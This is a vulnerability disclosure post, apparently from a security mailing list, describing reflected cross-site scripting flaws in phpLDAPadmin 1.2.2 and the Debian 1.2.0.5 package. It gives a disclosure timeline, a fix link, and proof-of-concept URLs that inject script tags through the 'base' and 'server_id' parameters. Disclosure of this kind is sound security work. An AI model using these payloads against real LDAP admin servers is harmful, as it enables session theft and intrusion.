[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]

XSS phpLDAPadmin: 1.2.0.5 (Debian package) and 1.2.2 (sourceforge)



Attach some PoC analysis related to a XSS vulnerability to phpldapadmin. I previously coordinate with the Cert-US in order they contact with Sourceforge and Debian, but receive they was unable to put in contact with them.

The first discover was on January 10 for 1.1.6 version, where after noticed that the same vulnerability was discover previously. For that reason I tested later for version 1.2.2 (sourceforge) and 1.2.0.5 (Debian package).
More reference: see the files attached

On January 24 I contacted to sourceforge and appear they fix the package but still persistence on debian packages.

Fix from sourceforge:
https://sourceforge.net/tracker/index.php?func=detail&aid=3477910&group_id=61828&atid=498546




Background:
===========
phpLDAPadmin is a web-based LDAP client. It provides easy, anywhere-accessible, multilanguage administration for your LDAP server. Its hierarchical tree-viewer and advanced search functionality make it intuitive to browse and administer your LDAP directory. Since it is a web application, this LDAP browser works on many platforms, making your LDAP server easily manageable from any location.


Details:
========

1.- Version 1.2.2 from Sourceforge package:http://sourceforge.net/projects/phpldapadmin/files/phpldapadmin-php5/1.2.2/phpldapadmin-1.2.2.tgz/download

Exploitables URI's: http://x.x.x.x/phpldapadmin/htdocs/cmd.php?cmd=query_engine&server_id=1&query=none&format=list&showresults=na&base=?&scope=sub&filter=objectClass%3D*&display_attrs=cn%2C+sn%2C+uid%2C+postalAddress%2C+telephoneNumber&orderby=&size_limit=50&search=Search

PoC:
http://x.x.x.x/phpldapadmin/htdocs/cmd.php?cmd=query_engine&server_id=1&query=none&format=list&showresults=na&base=%3Cscript%3Ealert%28%27XSS%27%29%3C%2Fscript%3E&scope=sub&filter=objectClass%3D*&display_attrs=cn%2C+sn%2C+uid%2C+postalAddress%2C+telephoneNumber&orderby=&size_limit=50&search=Search

Exploitable variable: base

Results: XSS passing through "base" variable.

2.- Version 1.2.0.5 from debian (testing and unstable repositories)
Package:
Version: 1.2.0.5-2
Depends: apache2 | httpd, php5-ldap, libapache2-mod-php5 | libapache-mod-php5 | php5-cgi | php5, ucf (>= 0.28), debconf (>= 0.5) | debconf-2.0
Filename: pool/main/p/phpldapadmin/phpldapadmin_1.2.0.5-2_all.deb
Size: 1276080
MD5sum: 3b4058f7fc74ff95f8223bf92bb99ec7
SHA1: 2594603f2346de814195bc6aba5e97a4febb17fb
SHA256: 4e1be7218c8030f1f17c5cd4c4f4fdb69cf5315d3e4b22bb2b4cabd7cfb93d57

PoC:

https://x.x.x.x/phpldapadmin/cmd.php?server_id=<script>alert('XSS')</script>
https://x.x.x.x/phpldapadmin/index.php?server_id=<script>alert('XSS')</script>&redirect=false

Exploitable Variable: server_id

Results: XSS passing through "server_id" variable.

Impact: Remote attackers might be able to perform Cross-Site Scripting (XSS) attacks by various vectors.

Thanks in advance for your comments
Kind Regards